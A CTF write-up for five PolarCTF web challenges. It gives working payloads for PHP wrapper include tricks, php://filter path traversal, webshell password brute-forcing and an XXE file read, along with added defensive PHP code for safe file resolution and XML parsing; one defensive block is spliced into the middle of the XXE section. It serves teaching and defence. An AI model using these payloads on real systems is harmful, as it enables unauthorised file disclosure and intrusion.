polarctf-web(21-25)

网站被黑 (Website Hacked)

Key points

PHP stream wrappers (pseudo-protocols)

Solution

A hint is found in the response headers; base32-decoding it gives /n0_0ne_f1nd_m3/.

Visiting that path returns:

```php
<?php
error_reporting(0);

$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag|data|base|write|input/i",$file)){
        echo "I am sorry but no way!";
        exit();
    }else{
        include($file); //imposible.php
    }
}
else{
    highlight_file(__FILE__);
}
?>
```

Satisfy the first if by feeding the expected string to text through the data:// wrapper: text=data://text/plain,welcome to the 504sys

Then include imposible.php through a PHP filter wrapper so that its source comes back encoded (including it unencoded just executes it and nothing is shown on the page): php://filter/read=string.rot13/resource=imposible.php

GET-POST

Key points

GET/POST requests

Solution

```php
<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
include('flag.php'); // file include: the flag is in flag.php; don't bother, requesting it directly won't help
$id = $_GET['id'];
echo "你必须让我感受到你的真诚,用GET请求传递一下id吧,令id=1";
if($id == '1'){
    echo "干的漂亮";
    echo "<br/>";
    echo "虽然我感受到了你的真诚,但还是不行,用POST请求传递一下jljcxy吧,令jljcxy=flag";
    $jljcxy = $_POST['jljcxy'];
    if($jljcxy == 'flag'){
        echo $flag;
    }
}
```

Just pass the parameters as the script asks (id=1 via GET, jljcxy=flag via POST).

被黑掉的站 (The Hacked Site)

Key points

Directory scanning, dictionary brute force

Solution

Directory scanning turns up a wordlist and a webshell; brute-forcing the shell's password with the wordlist yields the flag.

签到题 (Warm-up)

Key points

Request headers, PHP stream wrappers

Solution

Modifying the cookie reveals the path /data/index.php.

Pass php://filter/convert.base64-encode/resource=..././..././..././..././flag to read the contents of flag.php.

xxe

Key points

XXE vulnerability

Solution

Directory scanning finds a dom.php whose response is:
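Two of the challenges above fall to the same class of bug: a file name taken from the request is handed to include() or a filter wrapper after a denylist check (the first challenge) or a single-pass strip of ../ (the ..././ payload in this one, which collapses back to ../ once the inner ../ is removed; that the server used such a strip is my assumption, since the page only shows the payload). The following resolver is an added example, not code from any of the challenges: it refuses stream wrappers outright and validates the canonical path with realpath() against a base directory instead of pattern-matching the input. The directory layout and test inputs are constructed for the demo.

```php
<?php
// Added example (not from the challenges): resolve an untrusted file name to a
// real file inside one directory, rejecting wrappers and traversal of any form.
declare(strict_types=1);

// Shows why a single-pass strip is not a fix: "..././" collapses back to "../".
function naive_strip(string $path): string
{
    return str_replace('../', '', $path);   // non-recursive, one pass
}

/** Return the canonical path of $userPath inside $baseDir, or null to reject. */
function resolve_local_file(string $baseDir, string $userPath): ?string
{
    // 1. A plain file name never contains "://"; this rejects php://, data://,
    //    file:// and every other stream wrapper before any filesystem call.
    if (str_contains($userPath, '://') || str_starts_with($userPath, '\\\\')) {
        return null;
    }
    // 2. NUL bytes would truncate the name at the C layer (and PHP 8 throws on them).
    if (str_contains($userPath, "\0")) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // 3. realpath() canonicalises "..", "." and symlinks; whatever encoding the
    //    traversal used, the result is either unresolvable or outside $base.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && !str_starts_with($real, $prefix)) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// --- demo on a constructed layout: pages/ is allowed, flag.php sits above it ---
$root = sys_get_temp_dir() . '/inc_demo_' . bin2hex(random_bytes(4));
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/home.php", "<?php echo 'home';");
file_put_contents("$root/flag.php", "<?php \$flag = 'constructed';");

echo "naive_strip: ", naive_strip('..././..././flag'), "\n";   // ../../flag survives

$tests = [
    'home.php',
    'php://filter/read=string.rot13/resource=imposible.php',
    'data://text/plain,welcome to the 504sys',
    '../flag.php',
    '..././flag.php',
    "home.php\0.txt",
];
foreach ($tests as $t) {
    $r = resolve_local_file("$root/pages", $t);
    printf("%-56s => %s\n", addcslashes($t, "\0"), $r === null ? 'rejected' : 'ok: ' . basename($r));
}

// remove the constructed layout
unlink("$root/pages/home.php");
unlink("$root/flag.php");
rmdir("$root/pages");
rmdir($root);
```

Only home.php is accepted; the two wrapper payloads are rejected by the "://" check, ../flag.php resolves to a real file outside pages/ and is rejected by the prefix check, and ..././flag.php fails to resolve at all because "..." is not an existing directory. The denylist in the first challenge missed php://filter because none of its listed words appear in that wrapper, which is the general weakness of denylists: the safe rule is to decide what a file name may be, not what it may not contain.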

```text
Warning: DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1 in /var/www/html/dom.php on line 5
DOMDocument Object ( [doctype] => [implementation] => (object value omitted) [documentElement] => [actualEncoding] => [encoding] => [xmlEncoding] => [standalone] => 1 [xmlStandalone] => 1 [version] => 1.0 [xmlVersion] => 1.0 [strictErrorChecking] => 1 [documentURI] => [config] => [formatOutput] => [validateOnParse] => [resolveExternals] => [preserveWhiteSpace] => 1 [recover] => [substituteEntities] => [nodeName] => #document [nodeValue] => [nodeType] => 9 [parentNode] => [childNodes] => (object value omitted) [firstChild] => [lastChild] => [previousSibling] => [nextSibling] => [attributes] => [ownerDocument] => [namespaceURI] => [prefix] => [localName] => [baseURI] => [textContent] => )
```

So the script parses XML supplied by the client, and the leaked warning also reveals the script path /var/www/html/dom.php.

```xml
<?xml version = "1.0" encoding="utf-8"?>

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
<name>&xxe;</name>
```

The response contains the base64-encoded flag.
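The dom.php above does two things a parser of untrusted XML should not: it lets libxml warnings reach the client (disclosing the server path) and it expands a SYSTEM entity declared in an inline DTD. The loader below is an added example, not the challenge's dom.php: it refuses any document carrying a DOCTYPE, loads with LIBXML_NONET and without LIBXML_NOENT or LIBXML_DTDLOAD, and reports parse errors by line number only. The three inputs are constructed for the demo (the first is the payload from this writeup).

```php
<?php
// Added example (not the challenge's dom.php): parse untrusted XML without
// DTDs, entity substitution or network access, and without leaking libxml text.
declare(strict_types=1);

/** Parse untrusted XML. Returns the DOMDocument, or null with $error set. */
function parse_untrusted_xml(string $xml, ?string &$error = null): ?DOMDocument
{
    $error = null;
    if (trim($xml) === '') {
        $error = 'empty document';
        return null;
    }
    // An inline DTD is the only place a client can declare entities, and this
    // application never needs one, so reject it before parsing.
    if (preg_match('/<!DOCTYPE/', $xml) === 1) {
        $error = 'DOCTYPE not allowed';
        return null;
    }

    // Capture libxml diagnostics instead of letting them print as warnings.
    $previous = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        $dom->resolveExternals   = false;  // never fetch external DTDs or entities
        $dom->substituteEntities = false;  // keep &name; as an unexpanded reference
        // LIBXML_NONET blocks network access. LIBXML_NOENT is deliberately absent:
        // it is the option that turns a SYSTEM entity into a file read.
        $ok = $dom->loadXML($xml, LIBXML_NONET | LIBXML_NOBLANKS);
        if ($ok === false) {
            $first = libxml_get_errors()[0] ?? null;
            // Report position only; never echo paths or raw libxml messages.
            $error = $first ? sprintf('malformed XML at line %d', $first->line) : 'malformed XML';
            return null;
        }
        // Defence in depth: if a DTD slipped past the textual check, reject anyway.
        if ($dom->doctype !== null) {
            $error = 'DOCTYPE not allowed';
            return null;
        }
        return $dom;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($previous);
    }
}

// --- demo on constructed inputs ---
$payload = <<<XML
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
<name>&xxe;</name>
XML;

$inputs = [
    'xxe payload' => $payload,
    'benign'      => '<name>Alice</name>',
    'not xml'     => 'hello',
];
foreach ($inputs as $label => $xml) {
    $dom = parse_untrusted_xml($xml, $err);
    echo str_pad($label, 12), ' => ',
        $dom === null ? "rejected ($err)" : 'ok, name=' . $dom->documentElement->textContent, "\n";
}
```

The payload is rejected on the DOCTYPE check, the benign document parses and yields Alice, and the bare string hello is reported as "malformed XML at line 1" instead of the full "Start tag expected ... in /var/www/html/dom.php" warning the challenge leaked. On PHP 8 with libxml 2.9 or later external entity loading is already off by default (libxml_disable_entity_loader() is deprecated for that reason), so the remaining mistake to avoid is passing LIBXML_NOENT or setting substituteEntities = true yourself.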